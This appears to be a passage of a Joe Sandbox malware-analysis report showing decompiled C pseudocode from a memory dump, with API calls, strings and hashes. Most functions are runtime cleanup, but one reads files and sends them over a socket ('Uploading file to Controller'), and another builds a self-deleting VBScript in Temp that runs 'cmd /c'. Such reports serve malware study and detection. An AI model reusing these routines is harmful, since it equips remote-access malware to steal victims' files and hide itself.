                    					E00445002(_t170);
                    					_v40 = E004443F4(_t172, 0x180, 1);
                    					E00445002(_t170);
                    					_t197 = E004443F4(_t172, 0x101, 1);
                    					_v52 = _t197;
                    					E00445002(_t170);
                    					_t219 = _t218 + 0x3c;
                    					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                    						L36:
                    						E00445002(_v44);
                    						E00445002(_v32);
                    						E00445002(_v36);
                    						E00445002(_v40);
                    						_t170 = 1;
                    						__eflags = 1;
                    						goto L37;
                    					} else {
                    						_t123 = _t170;
                    						do {
                    							 *(_t123 + _t197) = _t123;
                    							_t123 = _t123 + 1;
                    						} while (_t123 < 0x100);
                    						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                    							goto L36;
                    						}
                    						_t126 = _v28;
                    						_t235 = _t126 - 5;
                    						if(_t126 > 5) {
                    							goto L36;
                    						}
                    						_t28 = _t197 + 1; // 0x1
                    						_v48 = _t126 & 0x0000ffff;
                    						_t192 = 0xff;
                    						_t130 = E004496E6(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						_t236 = _t130;
                    						if(_t130 == 0) {
                    							goto L36;
                    						}
                    						_t34 = _t197 + 1; // 0x1
                    						_t134 = E004496E6(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						if(_t134 == 0) {
                    							goto L36;
                    						}
                    						if(_v48 <= 1 || _v22 == _t170) {
                    							L22:
                    							_v60 = _v32 + 0x100;
                    							_t137 = E0044F9AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                    							_t219 = _t219 + 0x1c;
                    							if(_t137 == 0) {
                    								goto L36;
                    							}
                    							_t193 = _v32;
                    							_t138 = _t193 + 0xfe;
                    							 *_t138 = 0;
                    							_t179 = _v36;
                    							_v32 = _t138;
                    							_t139 = _v40;
                    							 *(_t179 + 0x7f) = _t170;
                    							_t180 = _t179 - 0xffffff80;
                    							 *(_t139 + 0x7f) = _t170;
                    							_v68 = _t180;
                    							 *_t180 = _t170;
                    							_t181 = _t139 + 0x80;
                    							_v56 = _t181;
                    							 *_t181 = _t170;
                    							if(_v48 <= 1 || _v22 == _t170) {
                    								L32:
                    								_t182 = 0x3f;
                    								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								asm("movsb");
                    								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                    								asm("movsw");
                    								asm("movsb");
                    								_t215 = _v64;
                    								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                    									asm("lock xadd [ecx], eax");
                    									if((_t142 | 0xffffffff) == 0) {
                    										E00445002( *(_t215 + 0x90) - 0xfe);
                    										E00445002( *(_t215 + 0x94) - 0x80);
                    										E00445002( *(_t215 + 0x98) - 0x80);
                    										E00445002( *((intOrPtr*)(_t215 + 0x8c)));
                    									}
                    								}
                    								_t143 = _v44;
                    								 *_t143 = 1;
                    								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                    								 *_t215 = _v60;
                    								 *(_t215 + 0x90) = _v32;
                    								 *(_t215 + 0x94) = _v68;
                    								 *(_t215 + 0x98) = _v56;
                    								 *(_t215 + 4) = _v48;
                    								L37:
                    								E00445002(_v52);
                    								goto L41;
                    							} else {
                    								_t189 =  &_v21;
                    								while(1) {
                    									_t160 =  *_t189;
                    									if(_t160 == 0) {
                    										break;
                    									}
                    									_t216 =  *(_t189 - 1) & 0x000000ff;
                    									if(_t216 > (_t160 & 0x000000ff)) {
                    										L30:
                    										_t189 =  &(_t189[2]);
                    										if( *(_t189 - 1) != _t170) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t209 = _t193 + 0x100 + _t216 * 2;
                    									do {
                    										_t216 = _t216 + 1;
                    										 *_t209 = 0x8000;
                    										_t209 = _t209 + 2;
                    									} while (_t216 <= ( *_t189 & 0x000000ff));
                    									goto L30;
                    								}
                    								goto L32;
                    							}
                    						} else {
                    							_t190 =  &_v21;
                    							while(1) {
                    								_t165 =  *_t190;
                    								if(_t165 == 0) {
                    									goto L22;
                    								}
                    								_t192 =  *(_t190 - 1) & 0x000000ff;
                    								_t166 = _t165 & 0x000000ff;
                    								while(_t192 <= _t166) {
                    									 *((char*)(_t192 + _t197)) = 0x20;
                    									_t192 = _t192 + 1;
                    									__eflags = _t192;
                    									_t166 =  *_t190 & 0x000000ff;
                    								}
                    								_t190 =  &(_t190[2]);
                    								_t242 =  *(_t190 - 1) - _t170;
                    								if( *(_t190 - 1) != _t170) {
                    									continue;
                    								}
                    								goto L22;
                    							}
                    							goto L22;
                    						}
                    					}
                    				}
                    				_t168 = E004516F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                    				_t219 = _t218 + 0x14;
                    				if(_t168 != 0) {
                    					goto L36;
                    				}
                    				goto L3;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                    • Instruction ID: ad40bc67768ff577a85139c61b858be7675e1a203c69b77c022c2f93fc340f39
                    • Opcode Fuzzy Hash: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                    • Instruction Fuzzy Hash: D5B1AFB1900245AFEB20DF79C881BAFBBF4BF49304F14406EF495A7352DB7998419B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044FB46(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x46f188) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E00445002(_t46);
                    							E0044ED82( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E00445002(_t47);
                    							E0044F23C( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E00445002( *((intOrPtr*)(_t74 + 0x7c)));
                    						E00445002( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E00445002( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E00445002( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E00445002( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E00445002( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E0044FCB9( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t55 = _t74 + 0xa0;
                    				_v8 = _t28;
                    				_t70 = _t74 + 0x28;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x46f2a8) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E00445002(_t31);
                    							E00445002( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t22 = _t70 - 4; // 0xffffcf90
                    						_t29 =  *_t22;
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E00445002(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E00445002(_t74);
                    			}

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0044FB8A
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044ED9F
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDB1
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDC3
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDD5
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDE7
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDF9
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE0B
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE1D
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE2F
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE41
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE53
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE65
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE77
                    • _free.LIBCMT ref: 0044FB7F
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044FBA1
                    • _free.LIBCMT ref: 0044FBB6
                    • _free.LIBCMT ref: 0044FBC1
                    • _free.LIBCMT ref: 0044FBE3
                    • _free.LIBCMT ref: 0044FBF6
                    • _free.LIBCMT ref: 0044FC04
                    • _free.LIBCMT ref: 0044FC0F
                    • _free.LIBCMT ref: 0044FC47
                    • _free.LIBCMT ref: 0044FC4E
                    • _free.LIBCMT ref: 0044FC6B
                    • _free.LIBCMT ref: 0044FC83
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                    • Instruction ID: 3ab02cf78170ad634f8d0de65b9125c41ac80f736b079e9f2e4498fa10b99b54
                    • Opcode Fuzzy Hash: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                    • Instruction Fuzzy Hash: 28316D71500A069FFF309A3AE846B5B73E8FF01318F10842FE498D6252DB39EC448B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E004081EE(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
                    				char _v12;
                    				void* _v16;
                    				char _v28;
                    				void* _v40;
                    				char _v52;
                    				void* _v56;
                    				char _v64;
                    				char _v76;
                    				void* _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v116;
                    				char _v124;
                    				char _v128;
                    				signed int _v140;
                    				char _v144;
                    				char _v148;
                    				struct %anon52 _v156;
                    				char _v164;
                    				void* _v168;
                    				struct %anon52 _v176;
                    				union _LARGE_INTEGER* _v180;
                    				void* _v184;
                    				intOrPtr _v188;
                    				long _v192;
                    				signed int _v196;
                    				intOrPtr _v200;
                    				union _LARGE_INTEGER* _v204;
                    				union _LARGE_INTEGER _v208;
                    				intOrPtr _v216;
                    				intOrPtr _v220;
                    				long _v224;
                    				signed int _v228;
                    				intOrPtr _v236;
                    				signed int _v244;
                    				intOrPtr _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t94;
                    				void* _t101;
                    				void* _t111;
                    				void* _t113;
                    				void* _t121;
                    				signed int _t134;
                    				void* _t135;
                    				signed int _t136;
                    				void* _t146;
                    				void* _t150;
                    				void* _t161;
                    				void* _t164;
                    				signed int _t167;
                    				struct _OVERLAPPED* _t169;
                    				struct %anon52 _t192;
                    				signed int _t208;
                    				void* _t214;
                    				union _LARGE_INTEGER* _t247;
                    				void* _t255;
                    				void* _t256;
                    				union _LARGE_INTEGER _t261;
                    				void* _t262;
                    				void* _t264;
                    				void* _t265;
                    				void* _t267;
                    				void* _t268;
                    				void* _t269;
                    				void* _t270;
                    				void* _t271;
                    				void* _t276;
                    
                    				_t266 =  &_v184;
                    				_v140 = _v140 & 0x00000000;
                    				_t255 = __ecx;
                    				_v176.LowPart = 0x186a0;
                    				if(_a4 != 0) {
                    					_t161 = E00406E3A(0x46a8f0);
                    					_t278 = _t161;
                    					if(_t161 != 0) {
                    						_t276 =  &_v184 - 0x18;
                    						E004086D0(_t167, _t276, 0x46a8f0, _t278,  &_a8);
                    						_t164 = E00419F8D(_t167,  &_v52, 0x46a8f0, _t264);
                    						_t266 = _t276 + 0x18;
                    						E00401EF3( &_a28, 0x46a8f0, _t256, _t164);
                    						E00401EE9();
                    					}
                    				}
                    				E0040480D(_t255);
                    				E004048A8(_t255, _t256, _t255);
                    				_t94 = E0041A879(_t167,  &_v124,  &_a28);
                    				_t267 = _t266 - 0x18;
                    				_t246 = E00402EF0(_t167,  &_v52, E00402EF0(_t167,  &_v28, E00402EF0(_t167,  &_v100, E0041A879(_t167,  &_v76,  &_a4), _t264, _t278, 0x472ec8), _t264, _t278,  &_a52), _t264, _t278, 0x472ec8);
                    				E00402E81(_t267, _t99, _t94);
                    				_push(0xb6);
                    				_t101 = E00404A81(_t255, _t99, _t278);
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				E00401FB8();
                    				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
                    					_t169 = 0;
                    					_t265 = CreateFileW(E00401EE4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
                    					__eflags = _t265 - 0xffffffff;
                    					if(__eflags != 0) {
                    						_v148 = 0;
                    						_v144 = 0;
                    						__imp__GetFileSizeEx( &_v148);
                    						_t247 = _v156.HighPart;
                    						_t192 = _v156;
                    						_v176 = _t192;
                    						_v180 = _t247;
                    						_v208.LowPart = _t192;
                    						_v200 = _t247;
                    						_v196 = 1;
                    						_v192 = 0;
                    						_t111 = E00455B00(_t192, _t247, 0x186a0, 0);
                    						asm("adc edx, ebx");
                    						_t113 = E0041A723(0,  &_v140, _t247, _t111 + 1, _t247);
                    						_t268 = _t267 - 0x10;
                    						E00402E81(_t268, E00402EF0(0,  &_v164, E0041A723(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x472ec8), _t113);
                    						E00404A81(_t255, _t115, __eflags, 0xb7, _t265);
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						_t121 = E0041A819( &_v192,  &_v64);
                    						_t269 = _t268 - 0x18;
                    						_t251 = "Uploading file to Controller: ";
                    						E004052DD(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
                    						_t270 = _t269 - 0x14;
                    						E00402073(0, _t270, "Uploading file to Controller: ", _t265, "i");
                    						E0041A04A(0, _t255);
                    						_t271 = _t270 + 0x30;
                    						_t208 =  &_v196;
                    						E00401FB8();
                    						asm("xorps xmm0, xmm0");
                    						asm("movlpd [esp+0x40], xmm0");
                    						__eflags = _v228;
                    						if(__eflags < 0) {
                    							L22:
                    							CloseHandle(_t265);
                    							E00404E06(_t251);
                    							_t169 = 1;
                    							goto L23;
                    						}
                    						if(__eflags > 0) {
                    							L11:
                    							_t261 = 0;
                    							__eflags = 0;
                    							_v204 = _v180;
                    							_v208.LowPart = _v184;
                    							_t134 = 0x186a0;
                    							goto L12;
                    							do {
                    								do {
                    									L12:
                    									_t246 = _v220;
                    									__eflags = _t261 - _t246;
                    									if(__eflags < 0) {
                    										L16:
                    										_push(_t134);
                    										_t135 = E004330A3(_t208, _t246, _t261, __eflags);
                    										_push(_t169);
                    										_t262 = _t135;
                    										_v192 = _t169;
                    										_v184 = _t262;
                    										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
                    										__eflags = _t136;
                    										if(_t136 == 0) {
                    											_t272 = _t271 - 0x18;
                    											_t214 = _t271 - 0x18;
                    											_push("SetFilePointerEx error");
                    											L27:
                    											E00402073(_t169, _t214, _t246, _t265);
                    											E00402073(_t169, _t272 - 0x18, _t246, _t265, "E");
                    											E0041A04A(_t169, _t255);
                    											E004330AC(_t262);
                    											CloseHandle(_t265);
                    											L28:
                    											E00404E06(_t246);
                    											goto L23;
                    										}
                    										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
                    										if(__eflags == 0) {
                    											_t272 = _t271 - 0x18;
                    											_t214 = _t271 - 0x18;
                    											_push("ReadFile error");
                    											goto L27;
                    										}
                    										_t146 = E00402097(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
                    										_t271 = _t271 - 0x18;
                    										_t253 = E00402EF0(_t169,  &_v176, E0041A723(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x472ec8);
                    										E00402E81(_t271, _t148, _t146);
                    										_push(0x52);
                    										_t150 = E00404A81(_t255, _t148, __eflags);
                    										__eflags = _t150 - 0xffffffff;
                    										E00401FB8();
                    										E00401FB8();
                    										E00401FB8();
                    										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
                    										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
                    											E00404E06(_t253);
                    											CloseHandle(_t265);
                    											E004330AC(_v204);
                    											goto L5;
                    										}
                    										goto L19;
                    									}
                    									_t208 = _v228;
                    									if(__eflags > 0) {
                    										L15:
                    										_t134 = _t208;
                    										_v188 = _t246;
                    										_v224 = _t134;
                    										goto L16;
                    									}
                    									__eflags = _t134 - _t208;
                    									if(__eflags <= 0) {
                    										goto L16;
                    									}
                    									goto L15;
                    									L19:
                    									E004330AC(_v204);
                    									_t134 = _v244;
                    									_v248 = _v248 - _t134;
                    									_t261 = _v208;
                    									asm("sbb [esp+0x20], esi");
                    									_v236 = _v236 + 1;
                    									_t251 = _v224;
                    									_t169 = 0;
                    									asm("adc [esp+0x24], ebx");
                    									_t208 = _v228 + _t134;
                    									_v228 = _t208;
                    									asm("adc edx, esi");
                    									_v224 = _t251;
                    									__eflags = _t251 - _v220;
                    								} while (__eflags < 0);
                    								if(__eflags > 0) {
                    									goto L22;
                    								}
                    								__eflags = _t208 - _v216;
                    							} while (_t208 < _v216);
                    							goto L22;
                    						}
                    						__eflags = _v196;
                    						if(_v196 <= 0) {
                    							goto L22;
                    						}
                    						goto L11;
                    					}
                    					E00402073(0, _t267 - 0x18, _t246, _t265, 0x464074);
                    					_push(0x53);
                    					E00404A81(_t255, _t246, __eflags);
                    					goto L28;
                    				} else {
                    					E00404E06(_t246);
                    					L5:
                    					_t169 = 0;
                    					L23:
                    					E00401EE9();
                    					E00401EE9();
                    					E00401FB8();
                    					return _t169;
                    				}
                    			}
                    0x00000000
                    0x00000000
                    0x0040848f
                    0x0040836e
                    0x00408373
                    0x00408377
                    0x00000000
                    0x0040832a
                    0x0040832c
                    0x00408331
                    0x00408331
                    0x004085e7
                    0x004085ee
                    0x004085fa
                    0x00408606
                    0x00408617
                    0x00408617

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408357
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040838F
                    • __aulldiv.LIBCMT ref: 004083C1
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004084E4
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004084FF
                    • CloseHandle.KERNEL32(00000000), ref: 004085D8
                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408622
                    • CloseHandle.KERNEL32(00000000), ref: 00408670
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                    • API String ID: 3086580692-2596673759
                    • Opcode ID: bf49574db012d4a60fa7420fc0d34fff476f35aa7b6696aefef9dd8a36c94de1
                    • Instruction ID: 2e3c2baa84d0001f6d92d6a12086262f6ba3ffa6ab37ef3033deaea4bc0aa555
                    • Opcode Fuzzy Hash: bf49574db012d4a60fa7420fc0d34fff476f35aa7b6696aefef9dd8a36c94de1
                    • Instruction Fuzzy Hash: 31B1C1316083409BC314FB65C981AAFB7E9AFC4354F40492FF489622D2EF789945CB9B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040CD03(void* __ebx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				char _v196;
                    				short _v716;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t36;
                    				void* _t37;
                    				void* _t40;
                    				void* _t54;
                    				void* _t67;
                    				void* _t68;
                    				void* _t79;
                    				void* _t137;
                    
                    				_t79 = __ebx;
                    				E00411D93();
                    				_t36 = E0040245C();
                    				_t37 = E00401F8B(0x473280);
                    				_t40 = E004129E0(E00401F8B(0x473238), "exepath",  &_v716, 0x208, _t37, _t36);
                    				_t141 = _t40;
                    				if(_t40 == 0) {
                    					GetModuleFileNameW(0,  &_v716, 0x208);
                    				}
                    				E00402FF4(_t79,  &_v124, E0041A7B9( &_v52, E0041A4D3( &_v76)), 0, _t137, _t141, L".vbs");
                    				E00401EE9();
                    				E00401FB8();
                    				E004042FD(_t79,  &_v100, E00402FF4(_t79,  &_v76, E0040415E(_t79,  &_v52, _t42, _t137, E0043A99F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
                    				E00401EE9();
                    				E00401EE9();
                    				E00401F66(_t79,  &_v28);
                    				_t54 = E0040415E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
                    				E0040323D(E00402FF4(_t79,  &_v76, E00402F85( &_v52, E00402FF4(_t79,  &_v148, E0040415E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				L004086C6(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                    				_t67 = E00401EE4( &_v100);
                    				_t68 = E0040245C();
                    				E00401EE4( &_v28);
                    				if(E0041AD6A(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v100), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401EE9();
                    				E00401EE9();
                    				return E00401EE9();
                    			}























                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                      • Part of subcall function 004129E0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                      • Part of subcall function 004129E0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                      • Part of subcall function 004129E0: RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,00000000,00000000), ref: 0040CD5D
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CEBC
                    • ExitProcess.KERNEL32 ref: 0040CEC8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$82G$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-4128442165
                    • Opcode ID: 598efda97eae89b6994bae8422a291eb7e13c3bad739fbf4068fde8bccd6e945
                    • Instruction ID: 0874bc144836ff93359e0d920a8661d2d2bf12b9c69f7d2e1fc1beb4cd6de9cb
                    • Opcode Fuzzy Hash: 598efda97eae89b6994bae8422a291eb7e13c3bad739fbf4068fde8bccd6e945
                    • Instruction Fuzzy Hash: C9414F319101185ACB14F7A2DC96DEE77B9AF50708F10017FF506B21E2EE385A4ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0044EE80(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				intOrPtr* _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t105;
                    				char _t195;
                    				char _t210;
                    				signed int _t213;
                    				void* _t224;
                    				char* _t226;
                    				signed int _t227;
                    				signed int _t231;
                    				signed int _t232;
                    				void* _t234;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t243;
                    				signed int _t244;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t247;
                    				signed int _t248;
                    				signed int _t249;
                    				signed int _t250;
                    				signed int _t251;
                    				signed int _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				char* _t257;
                    
                    				_t224 = __edx;
                    				_t210 = _a4;
                    				_v16 = 0;
                    				_v28 = _t210;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                    					_t234 = E004443F4(0, 1, 0x50);
                    					_v8 = _t234;
                    					E00445002(0);
                    					if(_t234 != 0) {
                    						_t227 = E004443F4(0, 1, 4);
                    						_v12 = _t227;
                    						E00445002(0);
                    						if(_t227 != 0) {
                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                    								_t213 = 0x14;
                    								memcpy(_v8, 0x46f188, _t213 << 2);
                    								L25:
                    								_t236 = _v8;
                    								_t231 = _v16;
                    								 *_t236 =  *( *(_t210 + 0x88));
                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                    								 *_v12 = 1;
                    								if(_t231 != 0) {
                    									 *_t231 = 1;
                    								}
                    								goto L27;
                    							}
                    							_t232 = E004443F4(0, 1, 4);
                    							_v16 = _t232;
                    							E00445002(0);
                    							if(_t232 != 0) {
                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                    								_t14 = _t234 + 0xc; // 0xc
                    								_t237 = E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                    								_t238 = _t237 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                    								_t239 = _t238 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                    								_t240 = _t239 | E004516F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                    								_v20 = _v8 + 0x1c;
                    								_t241 = _t240 | E004516F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
